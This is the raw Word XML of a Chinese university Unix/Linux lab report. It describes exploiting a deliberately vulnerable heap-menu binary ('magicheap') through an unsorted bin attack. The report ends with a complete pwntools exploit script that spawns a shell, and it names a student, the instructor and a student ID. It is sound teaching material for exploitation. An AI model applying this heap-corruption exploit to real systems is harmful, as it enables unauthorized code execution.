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rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Arial"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="27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4058920" cy="1070610"/>
            <wp:effectExtent l="0" t="0" r="10160" b="11430"/>
            <wp:docPr id="101" name="图片 10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8"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Arial"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Arial"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Arial"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="90"/>
          <w:szCs w:val="90"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="90"/>
          <w:szCs w:val="90"/>
        </w:rPr>
        <w:t>Unix/Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="90"/>
          <w:szCs w:val="90"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>课程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="90"/>
          <w:szCs w:val="90"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="90"/>
          <w:szCs w:val="90"/>
        </w:rPr>
        <w:t>实验报告</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Arial"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Arial"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Arial"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Arial"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="10"/>
        <w:tblW w:w="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151"/>
      </w:tblGrid>
      <w:tr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</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>院：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4151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计算机学院</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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专业年级：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信安1</w:t>
            </w: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80</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>班</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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指导教师：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胡小龙</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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号：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820818131</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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学生姓名：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宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
                <w:lang w:val="en-US" w:eastAsia="zh-Hans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Hans"/>
              </w:rPr>
              <w:t>唐文杰</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:ascii="黑体" w:hAnsi="宋体" w:eastAsia="黑体" w:cs="Arial"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr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hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>年12月</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>31</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>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本次实验目的是通过一个有漏洞的可执行程序作为入口点，最终拿到服务器的root权限。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本次实验中我做的主要内容就是通过有漏洞的程序攻击得到shell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例行检查，64位程序，开启了nx和canary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2933700" cy="866775"/>
            <wp:effectExtent l="0" t="0" r="12700" b="22225"/>
            <wp:docPr id="2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本地试运行一下，经典的堆的菜单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3829050" cy="1466850"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="14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64位ida载入，检索程序里的字符串的时候发现了后门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7485" cy="2790190"/>
            <wp:effectExtent l="0" t="0" r="5715" b="3810"/>
            <wp:docPr id="15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main（）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095875" cy="9610725"/>
            <wp:effectExtent l="0" t="0" r="9525" b="15875"/>
            <wp:docPr id="18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61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可以看到，当v5=4=4869，而且magic在bss段，只要覆写magic&gt;0x1305就能够获取到shell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create_heap（）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184775" cy="3389630"/>
            <wp:effectExtent l="0" t="0" r="22225" b="13970"/>
            <wp:docPr id="19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edit_heap()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582920" cy="2915285"/>
            <wp:effectExtent l="0" t="0" r="5080" b="5715"/>
            <wp:docPr id="16" name="图片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delete_heap()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177155" cy="2767965"/>
            <wp:effectExtent l="0" t="0" r="4445" b="635"/>
            <wp:docPr id="20" name="图片 1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利用思路：首先通过 unsorted bin attack 覆盖 magic&gt;0x1305，然后输入 v3= 4849, 就可以拿到 shell了。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利用过程：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首先创建三个chunk，之后free（chunk1)。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CreateHeap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default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>0x30,'aaaa')#0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CreateHeap(0x80,'bbbb')#1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CreateHeap(0x10,'cccc')#2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DeleteHeap(1)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chunk 2 是为了防止 free chunk 1 的时候 chunk 1 与 top chunk 合并，chunk0，chunk2的大小随意，chunk1的大小要&gt;0x80（fast bin最大为0x80）,这样free它的时候会进入到unsorted bin（chunk在被释放后，如果其大小不在fast bin的范围内，会被先放到unsorted bin,在申请内存的时候如果大小不是fast bin大小的内存并且在small bin中没有找到合适的chunk，就会去unsorted中寻找。《N1BOOK》p367），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此时的堆布局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039360" cy="2676525"/>
            <wp:effectExtent l="0" t="0" r="15240" b="15875"/>
            <wp:docPr id="17" name="图片 1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我们通过 chunk 0 溢出覆写 chunk 1 的 bk 指针，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magic = 0x6020A0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EditHeap(0,0x50,0x30 * "a" + p64(0)+p64(0x91)+p64(0)+p64(magic-0x10))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此时堆布局如下，可以看到chunk1的bk已经被我们改写了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38115" cy="2630805"/>
            <wp:effectExtent l="0" t="0" r="19685" b="10795"/>
            <wp:docPr id="23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然后我们再次创建与 chunk 1 同样大小的 chunk ，被 free 掉的 chunk 1 就会从 unsorted bin 中取出，做脱链操作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CreateHeap(0x80,'dddd')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unsorted_chunks(av)-&gt;bk = bck = victim-&gt;bk = magic - 0x10;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bck-&gt;fd  = *(magic - 0x10 + 0x10) = unsorted_chunks(av);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即我们向 magic 写入了一个 大于 0x1305 的值（unsorted bin 链表头地址），然后我们再次 malloc 与 unsorted bin 一样大小的块就可以进入 get_flag 成功拿 shell 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攻击脚本如下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans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from pwn import *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Hans"/>
              </w:rPr>
              <w:t>p = process('./magicheap')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def CreateHeap(size,content):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p.recvuntil(':')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p.sendline('1')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p.recvuntil(':')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p.sendline(str(size))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p.recvuntil(':')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p.sendline(content)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def EditHeap(idx,size,content):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p.recvuntil(':')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p.sendline('2')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p.recvuntil(':')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p.sendline(str(idx))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p.recvuntil(':')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p.sendline(str(size))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p.recvuntil(':')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p.sendline(content)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def DeleteHeap(idx):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p.recvuntil(':')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p.sendline('3')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p.recvuntil(':')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p.sendline(str(idx))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CreateHeap(0x30,'aaaa')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CreateHeap(0x80,'bbbb')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CreateHeap(0x10,'cccc')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DeleteHeap(1)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#gdb.attach(p)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magic = 0x6020A0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EditHeap(0,0x50,0x30 * "a" + p64(0)+p64(0x91)+p64(0)+p64(magic-0x10))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#gdb.attach(p)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CreateHeap(0x80,'dddd')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#gdb.attach(p)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p.sendlineafter(':','4869')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p.interactive()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19C0"/>
    <w:rsid w:val="0D1A7BEF"/>
    <w:rsid w:val="11A653F8"/>
    <w:rsid w:val="18C564D5"/>
    <w:rsid w:val="1AB37E3D"/>
    <w:rsid w:val="1AEF1EC0"/>
    <w:rsid w:val="1B7B2AB6"/>
    <w:rsid w:val="1CE00CA0"/>
    <w:rsid w:val="1E7D6817"/>
    <w:rsid w:val="1E8FA873"/>
    <w:rsid w:val="21B30F23"/>
    <w:rsid w:val="2276099C"/>
    <w:rsid w:val="2573778C"/>
    <w:rsid w:val="25F4758F"/>
    <w:rsid w:val="28FD0062"/>
    <w:rsid w:val="2DFF081E"/>
    <w:rsid w:val="2F4D3732"/>
    <w:rsid w:val="30645F83"/>
    <w:rsid w:val="31A93C50"/>
    <w:rsid w:val="33153A4A"/>
    <w:rsid w:val="3DE7A0FC"/>
    <w:rsid w:val="49AD3721"/>
    <w:rsid w:val="4AC0493B"/>
    <w:rsid w:val="4B896D48"/>
    <w:rsid w:val="4B99663A"/>
    <w:rsid w:val="4FEF3617"/>
    <w:rsid w:val="51557F35"/>
    <w:rsid w:val="53D55196"/>
    <w:rsid w:val="56892CEA"/>
    <w:rsid w:val="572C1931"/>
    <w:rsid w:val="65AE1ACC"/>
    <w:rsid w:val="671738FE"/>
    <w:rsid w:val="6EE505E1"/>
    <w:rsid w:val="7425746E"/>
    <w:rsid w:val="75450E69"/>
    <w:rsid w:val="777743D1"/>
    <w:rsid w:val="777E0803"/>
    <w:rsid w:val="79BF1471"/>
    <w:rsid w:val="7EAA3166"/>
    <w:rsid w:val="8FFF7C60"/>
    <w:rsid w:val="AFBB41C0"/>
    <w:rsid w:val="BE97D7FF"/>
    <w:rsid w:val="ED23A972"/>
    <w:rsid w:val="EE7CA3BD"/>
    <w:rsid w:val="FBCC6183"/>
    <w:rsid w:val="FD5F3D4A"/>
    <w:rsid w:val="FDB77B8D"/>
    <w:rsid w:val="FDBF3477"/>
    <w:rsid w:val="FDEE4DA2"/>
    <w:rsid w:val="FF9DD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2021-01-17T17:13:00Z</dcterms:created>
  <dc:creator>lenovo</dc:creator>
  <cp:lastModifiedBy>shirohaethu</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-01-18T08:51:14Z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